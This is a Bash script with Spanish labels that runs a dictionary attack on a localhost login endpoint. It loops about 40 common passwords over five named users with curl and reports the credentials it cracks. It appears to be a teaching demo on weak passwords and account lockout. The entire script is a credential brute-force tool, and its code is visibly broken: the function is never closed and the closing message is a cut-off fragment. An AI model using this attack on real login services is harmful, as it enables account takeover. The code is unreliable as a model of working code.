#!/bin/bash
API_URL="http://localhost:8000"
echo "=== ATAQUE=="
passwords=(
    "123456" "12345678" "1234" "12345" "123456789" "password" "password1" 
    "Password" "PASSWORD" "admin" "Admin" "abc123" "123abc" "qwerty" 
    "monkey" "letmein" "111111" "123123" "hello" "passw0rd" "master" 
    "123" "ABC2024" "Pass09" "AjIplj0" "Abyss98" "bohemian" "secret"
    "login" "welcome" "sunshine" "princess" "qwertyuiop" "superman"
    "michael" "football" "baseball" "jennifer" "hannah" "michelle"
)

usuarios=("Camila" "Matias" "Valeria" "Milena" "Angelica")
atacar_usuario() {
    local usuario=$1
    local encontrado=0
    local intentos=0
    echo "usuario: $usuario"    
    for password in "${passwords[@]}"; do
        ((intentos++))
        respuesta=$(curl -s -X POST "$API_URL/login" \
            -H "Content-Type: application/json" \
            -d "{\"username\":\"$usuario\", \"password\":\"$password\"}")

        if echo "$respuesta" | grep -q "exitoso"; then
            echo "   Usuario: $usuario"
            echo "   Contraseña: $password"
            echo "   Intentos necesarios: $intentos"
            echo ""
            encontrado=1
            break
        fi
    done
for usuario in "${usuarios[@]}"; do
    atacar_usuario "$usuario"
    sleep 2  
done

echo "de contraseñas fuertes y sistemas de bloqueo por intentos fallidos."
